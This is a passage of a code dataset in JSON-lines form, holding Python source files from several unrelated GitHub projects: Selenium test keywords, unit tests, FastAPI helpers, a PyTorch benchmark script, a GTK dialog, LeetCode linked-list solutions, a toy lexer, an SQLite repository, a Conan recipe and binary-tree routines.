setMagnitude(\"select.out\", config)\n os.chdir(root)\n","repo_name":"saeedsltm/DPLE","sub_path":"hypocenter/Locate.py","file_name":"Locate.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33616741099","text":"from SeleniumLibrary.base import keyword\nfrom selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom SeleniumLibrary import SeleniumLibrary\nclass SeleniumELibrary(SeleniumLibrary):\n @keyword\n def right_click_element_at_coordinates(self, locator, xoffset, yoffset):\n element = self.find_element(locator)\n action = ActionChains(self.driver)\n action.move_to_element(element)\n action.move_by_offset(xoffset, yoffset)\n action.context_click()\n action.perform()\n\n\n @keyword\n def double_click_element_at_coordinates(self, locator, xoffset, yoffset):\n element = self.find_element(locator)\n action = ActionChains(self.driver)\n action.move_to_element(element)\n action.move_by_offset(xoffset, yoffset)\n action.double_click()\n action.perform()\n \n @keyword\n def Mouse_Move(self,xoffset,yoffset):\n action = ActionChains(self.driver)\n action.move_by_offset(xoffset,yoffset)\n action.click(None)\n action.perform()\n\n @keyword\n def copy_to_clipboard(self, command):\n clipboard.copy(command)\n\n @keyword\n def paste_command_to_console(self, command):\n clipboard.copy(command)\n \n \n # @keyword\n # def double_click_element_at_coordinates(self, locator, xoffset, yoffset):\n # element = self.find_element(locator)\n # ActionChains(self.driver).move_to_element_with_offset(element, xoffset, yoffset).double_click().perform()\n","repo_name":"PARTTIC/AutomatedTesting","sub_path":"RobotFramework_Wolftail/resources/library/SeleniumELibrary.py","file_name":"SeleniumELibrary.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"375047156","text":"import unittest\n\nimport gi # nopep8\ngi.require_version('Gst', '1.0') # nopep8\ngi.require_version('GstVideo', '1.0') # nopep8\nfrom gi.repository import Gst\nfrom gi.repository import GstVideo\nimport numpy as np\nimport cv2 as cv\n\nfrom rr.actions.record_event import RecordEvent\n\n\nwidth = 320\nheight = 240\nfmt = \"RGBA\"\nsize = 320 * 240 * 4\ndata = np.zeros((size))\n\n\nclass mockMedia():\n def __init__(self, name):\n self.media_name = name\n\n def get_name(self):\n return self.media_name\n\n\nclass MockSample():\n def __init__(self):\n self._pts = 0\n\n def get_buffer(self):\n data = np.zeros((size))\n buf = Gst.Buffer.new_wrapped(data)\n buf.pts = self._pts\n buf.dts = self._pts\n buf.duration = 33333333\n self._pts = self._pts + 33333333\n return buf\n\n\nclass MockImage():\n def __init__(self, timestamp):\n self._sample = MockSample()\n self._timestamp = timestamp\n\n def get_width(self):\n return width\n\n def get_height(self):\n return height\n\n def get_format(self):\n return fmt\n\n def get_sample(self):\n return self._sample\n\n def get_timestamp(self):\n return self._timestamp\n\n\nclass MockFilter():\n def __init__(self, status):\n self.trigger_status = status\n\n def is_triggered(self):\n return self.trigger_status\n\n\nclass TestRecordEvent(unittest.TestCase):\n\n def test_record_event_success(self):\n rec_dir = '/tmp'\n timestamp = '2021-07-27-12:00:20'\n img = MockImage(timestamp)\n fil = MockFilter(True)\n num_bufs = 10\n rec_time = 15.0\n event_rec = RecordEvent(\"name\", rec_dir, rec_time)\n\n media0 = mockMedia(\"media0\")\n for i in range(num_bufs):\n event_rec.execute(media0, img, None, [fil])\n\n media1 = mockMedia(\"media1\")\n for i in range(num_bufs):\n if i == 2:\n fil.trigger_status = False\n event_rec.execute(media1, img, rec_time, [fil])\n\n event_rec.stop_recordings()\n\n path_media0 = \"/tmp/detection_recording_media0_\" + timestamp + \".ts\"\n path_media1 = \"/tmp/detection_recording_media1_\" + timestamp + \".ts\"\n\n reader_media0 = cv.VideoCapture(path_media0)\n reader_media1 = cv.VideoCapture(path_media1)\n\n self.assertEqual(True, reader_media0.isOpened())\n self.assertEqual(True, reader_media1.isOpened())\n\n def test_not_recording_success(self):\n rec_dir = '/tmp'\n timestamp = '2022-08-27-12:00:20'\n img = MockImage(timestamp)\n fil = MockFilter(False)\n num_bufs = 10\n rec_time = 5.0\n event_rec = RecordEvent(\"name\", rec_dir, rec_time)\n\n media2 = mockMedia(\"media2\")\n for i in range(num_bufs):\n event_rec.execute(media2, img, None, [fil])\n\n path_media2 = \"/tmp/detection_recording_media2_\" + timestamp + \".ts\"\n\n reader_media2 = cv.VideoCapture(path_media2)\n\n self.assertEqual(False, reader_media2.isOpened())\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"RidgeRun/ti-edge-ai-demos","sub_path":"tests/actions/test_record_event.py","file_name":"test_record_event.py","file_ext":"py","file_size_in_byte":3073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31206635552","text":"import logging\n\nfrom typing import List, Optional\nfrom fastapi import Request\nfrom starlette.datastructures import FormData\n\nfrom schemas.image import ImageInfo\n\n\ndef query_param_alias(request: Request, aliases: List[str]) -> Optional[str]:\n for alias in aliases:\n param_value = request.query_params.get(alias)\n if param_value is not None:\n return param_value\n return None\n\n\nasync def form_data_alias(request: Request, aliases: List[str]) -> Optional[str]:\n form_data: FormData = await request.form()\n for alias in aliases:\n if alias in form_data:\n return form_data[alias]\n return None\n\n\nasync def log_request_info(\n request: Request,\n docType: Optional[str],\n pageNo: Optional[int],\n imgFile: Optional[bytes],\n):\n logging.info(\n f\"\\n[Request Info]\\n\"\n f\" - Method: {request.method}\\n\"\n f\" - URL: {request.url}\\n\"\n f\"\\n[Request Body]\\n\"\n f\" - docType: {docType}\\n\"\n f\" - pageNo: {pageNo}\\n\"\n f\" - imgFile: {imgFile}\\n\"\n )\n\n\nasync def process_request(\n docType: Optional[str], pageNo: Optional[int], imgFile: Optional[bytes]\n) -> ImageInfo:\n image_info = ImageInfo()\n\n image_info.document_type = docType\n if pageNo is not None:\n image_info.page_number = pageNo\n if imgFile is not None:\n image_info.img_file = imgFile\n\n return image_info\n","repo_name":"onair0817/fastapi-toy-project","sub_path":"app/utils/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"24040591265","text":"import unittest\n\nfrom cirque.capabilities.mountcapability import MountCapability\n\n\nclass TestMountCapability(unittest.TestCase):\n\n def test_mount_capability(self):\n mountcapability = MountCapability([('aaa', 'bbb')])\n self.assertEqual(mountcapability.name, 'Mount')\n args = mountcapability.get_docker_run_args(None)\n self.assertIn('volumes', args)\n self.assertEqual('aaa:bbb', args['volumes'][0])\n\n\nif __name__ == '__main__':\n suite = unittest.TestLoader().loadTestsFromTestCase(TestMountCapability)\n unittest.TextTestRunner(verbosity=2).run(suite)\n","repo_name":"openweave/cirque","sub_path":"cirque/capabilities/test/test_mount_capability.py","file_name":"test_mount_capability.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"77"} +{"seq_id":"21655333247","text":"import time\r\nimport torch\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport os\r\n\r\ndef benchmark(funcs, inputs, labels, metrics):\r\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n\r\n # Initialize metric dictionaries\r\n metric_values = {}\r\n for func in funcs:\r\n metric_values[func.__class__.__name__] = {metric.__class__.__name__: [] for metric in metrics}\r\n\r\n # Run each function and compute metrics for each input\r\n for func in funcs:\r\n for i in range(len(inputs)):\r\n input_tensor = torch.Tensor(inputs[i]).to(device)\r\n label_tensor = torch.Tensor(labels[i]).to(device)\r\n\r\n start_time = time.time()\r\n output = func(input_tensor)\r\n elapsed_time = time.time() - start_time\r\n\r\n for metric in metrics:\r\n metric_values[func.__class__.__name__][metric.__class__.__name__].append(metric(output.detach(), label_tensor.detach()).item())\r\n\r\n print(\"%s - Input %d: %.4f seconds\" % (func.__class__.__name__, i, elapsed_time))\r\n\r\n # Print metric values for each function and each input\r\n for func in funcs:\r\n for metric in metrics:\r\n print(\"%s - %s: %.4f\" % (func.__class__.__name__, metric.__class__.__name__, sum(metric_values[func.__class__.__name__][metric.__class__.__name__]) / len(metric_values[func.__class__.__name__][metric.__class__.__name__])))\r\n\r\n return metric_values\r\n\r\ndef plot_benchmark(metric_values, metrics, n=10):\r\n # Create directory to save plots\r\n save_dir = time.strftime(\"%Y-%m-%d_%H-%M-%S\")\r\n if not os.path.exists(save_dir):\r\n os.mkdir(save_dir)\r\n\r\n # Plot metric values for each metric\r\n for metric in metrics:\r\n metric_dir = os.path.join(save_dir, metric.__class__.__name__)\r\n if not os.path.exists(metric_dir):\r\n os.mkdir(metric_dir)\r\n\r\n fig, ax = plt.subplots(figsize=(8, 6))\r\n metric_name = metric.__class__.__name__\r\n\r\n # Get the length of the values from the first function\r\n index = np.arange(len(next(iter(metric_values[metric_name].values()))))\r\n\r\n for func_name, func_metric_values in metric_values[metric_name].items():\r\n ax.plot(index, func_metric_values, label=func_name)\r\n\r\n ax.set_xlabel('Input')\r\n ax.set_ylabel('Metric value')\r\n ax.set_title('Benchmark results')\r\n ax.set_xticks(index[::n])\r\n ax.set_xticklabels(index[::n])\r\n ax.legend()\r\n\r\n plt.tight_layout()\r\n plt.savefig(os.path.join(metric_dir, f\"{save_dir}_{metric_name}.png\"))\r\n plt.close()\r\n","repo_name":"HarshitGupta29/Benchmarking-InstantNGP","sub_path":"benchmark_suite.py","file_name":"benchmark_suite.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2259429929","text":"import app_state\nfrom gi.repository import Gtk\n\n\nclass SettingsDialog(Gtk.Dialog):\n\n def __init__(self, parent):\n Gtk.Dialog.__init__(\n self, \"Settings\", parent, 0,\n (Gtk.STOCK_CANCEL,\n Gtk.ResponseType.CANCEL,\n Gtk.STOCK_SAVE,\n Gtk.ResponseType.OK))\n self.set_default_size(320, 400)\n self.set_border_width(10)\n self.props.resizable = False\n self.deleted_locations = []\n self.init_components()\n\n def init_components(self):\n container = self.get_content_area()\n\n # labels\n container.pack_start(Gtk.Label('Locations'), False, False, 0)\n help_label = Gtk.Label()\n help_label.set_markup('double click any cell to edit')\n container.pack_start(help_label, False, False, 0)\n\n # tree view\n self.treeview_container = Gtk.ScrolledWindow()\n self.treeview_container.set_vexpand(True)\n locations = app_state.get_locations()\n self.store = Gtk.ListStore(str, str, str, str)\n for loc in locations:\n self.store.append(loc)\n self.treeview = Gtk.TreeView(model=self.store)\n for i, column_title in enumerate([\"Id\", \"Location Name\", \"Latitude\", \"Longitude\"]):\n renderer = Gtk.CellRendererText()\n if i == 0:\n column = Gtk.TreeViewColumn(column_title, renderer, text=i)\n column.props.visible = False\n else:\n renderer.props.editable = True\n renderer.connect(\"edited\", self.text_edited_handler(i))\n column = Gtk.TreeViewColumn(column_title, renderer, text=i)\n column.set_min_width(50)\n column.set_sizing(Gtk.TreeViewColumnSizing.AUTOSIZE)\n column.set_resizable(True)\n self.treeview.append_column(column)\n self.treeview_container.add(self.treeview)\n container.pack_start(self.treeview_container, True, True, 10)\n\n # action bar\n action_bar = Gtk.ActionBar()\n add_button = Gtk.Button.new_from_icon_name(\"list-add-symbolic\", Gtk.IconSize.LARGE_TOOLBAR)\n add_button.connect('clicked', self.add_button_clicked)\n action_bar.pack_start(add_button)\n delete_button = Gtk.Button.new_from_icon_name(\"edit-delete-symbolic\", Gtk.IconSize.LARGE_TOOLBAR)\n delete_button.connect('clicked', self.delete_button_clicked)\n action_bar.pack_start(delete_button)\n container.pack_end(action_bar, False, False, 5)\n\n self.show_all()\n\n def text_edited_handler(self, column_index):\n def text_edited(widget, path, text): # @UnusedVariable\n self.store[path][column_index] = text\n return text_edited\n\n def add_button_clicked(self, widget): # @UnusedVariable\n new_loation_model = ('-1', '_name_', '_lat_', '_long_')\n self.store.append(new_loation_model)\n\n def delete_button_clicked(self, widget): # @UnusedVariable\n selection = self.treeview.get_selection()\n model, paths = selection.get_selected_rows()\n self.deleted_locations.append(list(self.store[paths[0]]))\n for path in paths:\n model.remove(model.get_iter(path))\n\n def save_settings(self):\n locations = list(self.store)\n app_state.save_locations(locations, self.deleted_locations)\n\n\n# end of file\n","repo_name":"rabihkodeih/moonshot","sub_path":"dialogs/settings_dialog.py","file_name":"settings_dialog.py","file_ext":"py","file_size_in_byte":3416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25810993247","text":"\"\"\"\n# https://leetcode.com/problems/copy-list-with-random-pointer/\n\nA linked list of length n is given such that each node contains an additional\nrandom pointer, which could point to any node in the list, or null.\n\nConstruct a deep copy of the list. The deep copy should consist of exactly n\nbrand new nodes, where each new node has its value set to the value of its\ncorresponding original node. Both the next and random pointer of the new nodes\nshould point to new nodes in the copied list such that the pointers in the\noriginal list and copied list represent the same list state. None of the\npointers in the new list should point to nodes in the original list.\n\nFor example, if there are two nodes X and Y in the original list, where X.random\n--> Y, then for the corresponding two nodes x and y in the copied list, x.random\n--> y.\n\nReturn the head of the copied linked list.\n\"\"\"\n\nfrom collections import defaultdict\n\nclass Solution_1:\n # Not mine!\n # https://leetcode.com/problems/copy-list-with-random-pointer/discuss/43485/Clear-and-short-python-O(2n)-and-O(n)-solution\n def copyRandomList(self, head: \"Node\") -> \"Node\":\n dic = collections.defaultdict(lambda: Node(0))\n dic[None] = None\n n = head\n while n:\n dic[n].val = n.val\n dic[n].next = dic[n.next]\n dic[n].random = dic[n.random]\n n = n.next\n return dic[head]\n\nclass Solution:\n def copyRandomList(self, head: \"Node\") -> \"Node\":\n if not head:\n return None\n\n old_head = head\n new_head = Node(x=old_head.val)\n\n old_random_nodes = [old_head.random]\n old_node_to_new_node = {old_head: new_head}\n \n # Deep copy\n new_node = new_head\n for old_node in iter_nodes(old_head.next):\n old_random_nodes.append(old_node.random)\n new_node.next = Node(x=old_node.val)\n new_node = new_node.next \n old_node_to_new_node[old_node] = new_node\n\n # Set random pointers\n for new_node, old_random_node in zip(iter_nodes(new_head), old_random_nodes):\n if old_random_node:\n new_node.random = old_node_to_new_node[old_random_node]\n else:\n new_node.random = None\n \n return new_head\n \n \ndef iter_nodes(head):\n if head:\n yield head\n yield from iter_nodes(head.next)\n\n# Definition for a Node.\nclass Node:\n def __init__(self, x: int, next: 'Node' = None, random: 'Node' = None):\n self.val = int(x)\n self.next = next\n self.random = random\n","repo_name":"dandavison/misc-python","sub_path":"lc-copy-list-with-random-pointer.py","file_name":"lc-copy-list-with-random-pointer.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42571586958","text":"# import necessary libraries\nimport cv2\nimport matplotlib.pyplot as plt\n\n# read in the original image in grayscale\noriginal_img = cv2.imread(\"../images/Fig0221(a)(ctskull-256).tif\", flags=0)\n\n# the number of gray levels of the original image\nORIGINAL_GRAY_LEVELS = 256\n\n# define a list of target gray levels to which we will reduce the image\ntarget_gray_levels = [128, 64, 32, 16, 8, 4, 2]\n\n# create an empty list to store the reduced images\nreduced_img = []\n\n# loop over each target gray level\nfor levels in target_gray_levels:\n # calculate the scaling factor for this level\n alpha = ((levels - 1) / (ORIGINAL_GRAY_LEVELS - 1))\n\n # reduce the image to the target gray level and append it to the list of reduced images\n reduced_img.append(cv2.convertScaleAbs(original_img, alpha=alpha))\n\n# display the original image with 256 gray levels and the reduced images with the specified number of gray levels\nplt.subplots(2, 4, figsize=(14.4, 8.64))\nplt.subplot(241), plt.imshow(original_img, cmap='gray'), plt.title(\"256 levels\"), plt.axis('off')\nfor i in range(7):\n plt.subplot(242 + i), plt.imshow(reduced_img[i], cmap='gray'), \\\n plt.title(f\"{target_gray_levels[i]} levels\"), plt.axis('off')\nplt.suptitle(\"Intensity Under-sampling\", fontsize=20)\nplt.show()\n","repo_name":"Archelder/Digital-Image-Processing","sub_path":"Experiments/Exp.2/codes/under-sampling_intensity.py","file_name":"under-sampling_intensity.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"13815347014","text":"import scrapy\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.linkextractors import LinkExtractor\nfrom bonapp_spider.items import BonappItem\nimport re\n\n\nclass BonappBasicallySpider(CrawlSpider):\n # using crawl spider because i want to generalise the solution to keep clicking if there's a next page\n name = \"bonapp_basically_crawler\"\n allowed_domains = ['www.bonappetit.com']\n start_urls = ['https://www.bonappetit.com/healthyish/recipes/'] # change basically to healthyish if scraping for that\n\n # using CrawlSpider so rules need to be set\n # first rule checks if there's a next page available and follows it\n # second rule requests for all the links on the page that are in the specified format: /recipes/name\n rules = (\n Rule(LinkExtractor(restrict_xpaths=\"//a[contains(@class, 'pager__link--next')]\"), follow=True),\n Rule(LinkExtractor(restrict_xpaths=\"//h1[@class='feature-item-hed']//a\"), callback='parse_recipe_page')\n\n )\n\n def parse_recipe_page(self, response):\n\n title = response.xpath('//head//title/text()').get().split(' Recipe', 1)[0]\n\n author = response.xpath('//head//meta[@name=\"author\"]//@content').get()\n\n date = response.xpath('//div//time/text()').get() # this is not present in all types of recipes so add if else statement\n\n ## Some recipe pages (e.g. from Basically) have a different format\n if response.xpath('//div[@data-testid=\"IngredientList\"]'):\n ingredients = response.xpath(\n '//div[@data-testid=\"IngredientList\"]//div/descendant-or-self::*/text()').extract()\n else:\n ## Some ingredients have hyperlinked words for brands, the following navigates that possibility\n ingredients = []\n ingred_bin = response.xpath('//div[@class=\"ingredients__text\"]')\n for ingred in ingred_bin:\n if ingred.xpath('./a'):\n ingredients.append(''.join(ingred.xpath('.//descendant-or-self::*/text()').extract()))\n else:\n ingredients.append(ingred.xpath('./text()').extract()[0])\n\n ## Some recipes have no reviews/ratings so the following code accounts for it\n # identifies recipe pages with reviews by looking for the div class with id=reviews\n if response.xpath('//div[@id=\"reviews\"]'):\n review_header = response.xpath('//div[@id=\"reviews\"]//p/text()').get() # review_count is is x in Reviews (x)\n review_count = re.findall(r'(\\d+)', review_header)[0] # extract digits from the string as a string (otherwise re returns it as a list)\n else: review_count = 0\n\n # identifies recipe pages with ratings by seeing if the following div class has a p element (because the p element contains the rating and rating count)\n if response.xpath('//div[@data-testid=\"RatingWrapper\"]//p'):\n rating = response.xpath('//div[@data-testid=\"RatingWrapper\"]//p/text()')[0].get()\n ratings_count = response.xpath('//div[@data-testid=\"RatingWrapper\"]//p/text()')[2].get() # the ratings count is sandwiched between two parantheses\n else:\n rating = 'NA'\n ratings_count = 0\n\n # obtain tags from tagcloudwrapper\n tags = response.xpath('//div[@data-testid=\"TagCloudWrapper\"]//a//span/text()').getall()\n\n\n item = BonappItem()\n item[\"title\"] = title\n item[\"author\"] = author\n item[\"date\"] = date\n item[\"ingredients\"] = ingredients\n item[\"rating\"] = rating\n item[\"ratings_count\"] = ratings_count\n item[\"review_count\"] = review_count\n item[\"tags\"] = tags\n item[\"url\"] = response.url\n\n yield item","repo_name":"fangningtan/bon-app","sub_path":"bonapp_spider/spiders/bonapp-basically-spider.py","file_name":"bonapp-basically-spider.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43516019060","text":"from Infrastructure.inmemrepo.activity_repository import *\nimport sqlite3\nclass ActivitySqlRepo(ActivityRepo):\n\n def __init__(self, persons_repo):\n ActivityRepo.__init__(self, persons_repo)\n self.__connection = self.create_connection(\"activities\")\n create_persons_table = \"\"\"\n CREATE TABLE IF NOT EXISTS activities (\n activity_id INTEGER,\n persons_id TEXT NOT NULL,\n date TEXT NOT NULL,\n time TEXT NOT NULL,\n description TEXT NOT NULL\n );\n \"\"\"\n self.execute_query(self.__connection, create_persons_table)\n\n @staticmethod\n def create_connection(name):\n connection = sqlite3.connect(\"database/\" + name + \".sqlite\")\n return connection\n\n @staticmethod\n def execute_query(connection, query):\n cursor = connection.cursor()\n cursor.execute(query)\n connection.commit()\n\n def read_all_from_database(self):\n cursor = self.__connection.cursor()\n cursor.execute(\"SELECT * FROM activities\")\n activities_tuples = cursor.fetchall()\n for activity in activities_tuples:\n ActivityRepo.add_activity(self, [activity[0], activity[1].split(), activity[2], activity[3], activity[4]])\n\n def delete_activity_sql(self, id):\n cursor = self.__connection.cursor()\n cursor.execute('DELETE FROM activities WHERE activity_id=?', (id,))\n self.__connection.commit()\n\n def add_activity(self, new_activity):\n aux_new_activity = new_activity[:]\n ActivityRepo.add_activity(self, new_activity)\n cursor = self.__connection.cursor()\n\n aux_id_string = \"\"\n for pers_id in aux_new_activity[1][:]:\n string_aux = str(pers_id) + \" \"\n aux_id_string += string_aux\n\n aux_id_string = aux_id_string[:-1][:]\n cursor.execute(\"insert into activities (activity_id, persons_id, date, time, description) values (?, ?, ?, ?, ?)\", (int(aux_new_activity[0]), aux_id_string, aux_new_activity[2], aux_new_activity[3], aux_new_activity[4]))\n self.__connection.commit()\n\n def remove_activity_by_id(self, given_id):\n removed_activity = ActivityRepo.remove_activity_by_id(self, given_id)\n self.delete_activity_sql(given_id)\n return removed_activity\n\n def get_all(self):\n return ActivityRepo.get_all(self)\n\n def update_available_person_id_list(self, persons_list):\n ActivityRepo.update_available_person_id_list(self, persons_list)\n\n def update_schedule(self, activity_moment):\n ActivityRepo.update_schedule(self, activity_moment)\n\n\n","repo_name":"Tasadan-Filip/Activity-Planner-Application-with-Graphical-User-Interface","sub_path":"Infrastructure/SQL_Lite_repo/activities_sql_lite_database_repo.py","file_name":"activities_sql_lite_database_repo.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38307135343","text":"#stream of text put into compiler\r\ntext = 'x = ( 5 + 6 ) * ( 3 - 4 )'\r\n\r\n#function to tokenize the stream of text\r\nclass LexicalAnalyser():\r\n def __init__(self):\r\n self.tokens = []\r\n self.integers = (\"0123456789\")\r\n self.operators ={\r\n \"+\":\"Add\",\r\n \"-\":\"Subtract\",\r\n \"/\":\"divide\",\r\n \"*\":\"multiply\",\r\n }\r\n self.literals = ('\"')\r\n self.punctuation = (\".\", \",\", \";\", \",\")\r\n self.identifiers = {}\r\n self.colon = (\":\")\r\n self.openBracket = (\"(\")\r\n self.closeBracket = (\")\")\r\n self.conditional = (\"if\", \"else\", \"elif\")\r\n \r\n def tokenize(self, text):\r\n i = 0\r\n \r\n while i < len(text):\r\n \r\n if i == \" \":\r\n pass\r\n elif text[i] == self.openBracket:\r\n self.tokens.append((\"open bracket\", i))\r\n elif text[i] == self.closeBracket:\r\n self.tokens.append((\"close bracket\", i))\r\n elif text[i] == self.colon:\r\n self.tokens.append((\"colon\", i))\r\n elif text[i] in self.integers:\r\n s = f\"{text[i]}\"\r\n i += 1\r\n while i =1.53.0\"\n\n\nclass H3Conan(ConanFile):\n name = \"h3\"\n description = \"Hexagonal hierarchical geospatial indexing system.\"\n license = \"Apache-2.0\"\n topics = (\"hierarchical\", \"geospatial\", \"indexing\")\n homepage = \"https://github.com/uber/h3\"\n url = \"https://github.com/conan-io/conan-center-index\"\n\n package_type = \"library\"\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n options = {\n \"shared\": [True, False],\n \"fPIC\": [True, False],\n \"build_filters\": [True, False],\n \"h3_prefix\": [\"ANY\"],\n }\n default_options = {\n \"shared\": False,\n \"fPIC\": True,\n \"build_filters\": True,\n \"h3_prefix\": \"\",\n }\n\n def export_sources(self):\n export_conandata_patches(self)\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n\n def configure(self):\n if self.options.shared:\n self.options.rm_safe(\"fPIC\")\n self.settings.rm_safe(\"compiler.libcxx\")\n self.settings.rm_safe(\"compiler.cppstd\")\n\n def layout(self):\n cmake_layout(self, src_folder=\"src\")\n\n def build_requirements(self):\n if Version(self.version) >= \"4.1.0\":\n self.tool_requires(\"cmake/[>=3.20 <4]\")\n\n def source(self):\n get(self, **self.conan_data[\"sources\"][self.version], strip_root=True)\n\n def generate(self):\n tc = CMakeToolchain(self)\n tc.variables[\"H3_PREFIX\"] = self.options.h3_prefix\n tc.variables[\"ENABLE_COVERAGE\"] = False\n tc.variables[\"BUILD_BENCHMARKS\"] = False\n tc.variables[\"BUILD_FILTERS\"] = self.options.build_filters\n tc.variables[\"BUILD_GENERATORS\"] = False\n tc.variables[\"WARNINGS_AS_ERRORS\"] = False\n tc.variables[\"ENABLE_FORMAT\"] = False\n tc.variables[\"ENABLE_LINTING\"] = False\n tc.variables[\"ENABLE_DOCS\"] = False\n tc.variables[\"BUILD_TESTING\"] = False\n tc.generate()\n\n def build(self):\n apply_conandata_patches(self)\n cmake = CMake(self)\n cmake.configure()\n cmake.build()\n\n def package(self):\n copy(self, \"LICENSE\", src=self.source_folder, dst=os.path.join(self.package_folder, \"licenses\"))\n cmake = CMake(self)\n cmake.install()\n rmdir(self, os.path.join(self.package_folder, \"lib\", \"cmake\"))\n\n def package_info(self):\n self.cpp_info.set_property(\"cmake_file_name\", \"h3\")\n self.cpp_info.set_property(\"cmake_target_name\", \"h3::h3\")\n self.cpp_info.libs = [\"h3\"]\n self.cpp_info.defines.append(f\"H3_PREFIX={self.options.h3_prefix}\")\n if self.settings.os in [\"Linux\", \"FreeBSD\"]:\n self.cpp_info.system_libs.append(\"m\")\n\n if self.options.build_filters:\n self.env_info.PATH.append(os.path.join(self.package_folder, \"bin\"))\n","repo_name":"conan-io/conan-center-index","sub_path":"recipes/h3/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":3090,"program_lang":"python","lang":"en","doc_type":"code","stars":835,"dataset":"github-code","pt":"77"} +{"seq_id":"4974363536","text":"from __future__ import print_function\n\nclass Node:\n def __init__(self, key):\n self.key = key\n self.parent = None\n self.left = None\n self.right = None\n\n def insertLeft(self, t):\n self.left = t\n t.parent = self\n\n def insertRight(self, t):\n self.right = t\n t.parent = self\n\n def printTree0(self):\n if(self.left != None):\n self.left.printTree0()\n if(self.right != None):\n self.right.printTree0()\n print(self.key, end=\" \")\n \n def printTree1(self):\n if(self.left != None):\n self.left.printTree1()\n print(self.key, end=\" \")\n if(self.right != None):\n self.right.printTree1()\n \n def printTree2(self):\n print(self.key, end=\" \")\n if(self.left != None):\n self.left.printTree2()\n if(self.right != None):\n self.right.printTree2()\n \n def adjustHeap(self):\n leftKey = 0\n rightKey = 0\n maxChild = None\n if(self.left != None):\n leftKey = self.left.key\n if(self.right != None):\n rightKey = self.right.key\n if(leftKey > rightKey):\n maxChild = self.left\n elif(leftKey < rightKey):\n maxChild = self.right\n if(maxChild.key > self.key):\n tmp = self.key\n self.key = maxChild.key\n maxChild.key = tmp\n maxChild.adjustHeap()\n\n def makeBST(self, x):\n if(self.key == None):\n self.key = x\n return self\n q = self\n while(q != None):\n if(q.key == x):\n return self\n elif (q.key > x):\n if(q.left != None):\n q = q.left\n else:\n q.insertLeft(Node(x))\n return self\n elif (q.key < x):\n if(q.right != None):\n q = q.right\n else:\n q.insertRight(Node(x))\n return self\n return self\n\n def deleteInBST(self, x):\n p = self\n q = None #hold the parent during search\n pNode = None #hold the processing node\n cNode = None #hold the child node\n while p != None:\n if p.key == x:\n break\n q = p\n if (x < p.key):\n p = p.left\n if (x > p.key):\n p = p.right\n if p == None:\n return\n if (p.left != None and p.right != None):\n pNode = p\n q = p\n p = p.left\n while(p.right != None):\n q = p\n p = p.right\n pNode.key = p.key\n else:\n q = p.parent\n if(p.left != None):\n cNode = p.left\n else:\n cNode = p.right\n if q.left == p:\n q.left = cNode\n else:\n q.right = cNode\n return\n\ndef generateBinaryTree(depth, x):\n n = len(x)\n rootNode = Node(x[0])\n nodeList = [rootNode]\n tmp = 1\n for i in range(0, depth):\n newNodeList = []\n upBound = 2*i\n if(upBound == 0):\n upBound = 1\n for j in range(upBound):\n if(tmp > n-1):\n break\n nodeList[j].insertLeft(Node(x[tmp]))\n tmp += 1\n if(tmp > n-1):\n break\n nodeList[j].insertRight(Node(x[tmp]))\n tmp += 1\n newNodeList.append( nodeList[j].left)\n newNodeList.append( nodeList[j].right)\n nodeList = newNodeList\n return rootNode\n\ndef treeToArray(rootNode = Node(0), depth = 0):\n nodeList = [rootNode]\n arrayResult = [rootNode.key]\n for i in range(0, depth):\n newNodeList = []\n upBound = 2*i\n if(upBound == 0):\n upBound = 1\n for j in range(upBound):\n if(nodeList[j].left != None):\n arrayResult.append(nodeList[j].left.key)\n if(nodeList[j].right != None):\n arrayResult.append(nodeList[j].right.key)\n newNodeList.append( nodeList[j].left)\n newNodeList.append( nodeList[j].right)\n nodeList = newNodeList\n return arrayResult\n\ndef generateHeap(depth, x):\n n = len(x)\n rootNode = Node(x[0])\n nodeList = [rootNode]\n tmp = 1\n for i in range(0, depth):\n newNodeList = []\n upBound = 2*i\n if(upBound == 0):\n upBound = 1\n for j in range(upBound):\n if(tmp > n-1):\n break\n nodeList[j].insertLeft(Node(x[tmp]))\n heapingNode(nodeList[j].left)\n tmp += 1\n if(tmp > n-1):\n break\n nodeList[j].insertRight(Node(x[tmp]))\n heapingNode(nodeList[j].right)\n tmp += 1\n newNodeList.append( nodeList[j].left)\n newNodeList.append( nodeList[j].right)\n nodeList = newNodeList\n return rootNode\n\ndef heapingNode(node):\n while(node.parent != None):\n if(node.key > node.parent.key):\n tmp = node.key\n node.key = node.parent.key\n node.parent.key = tmp\n node = node.parent\n else:\n 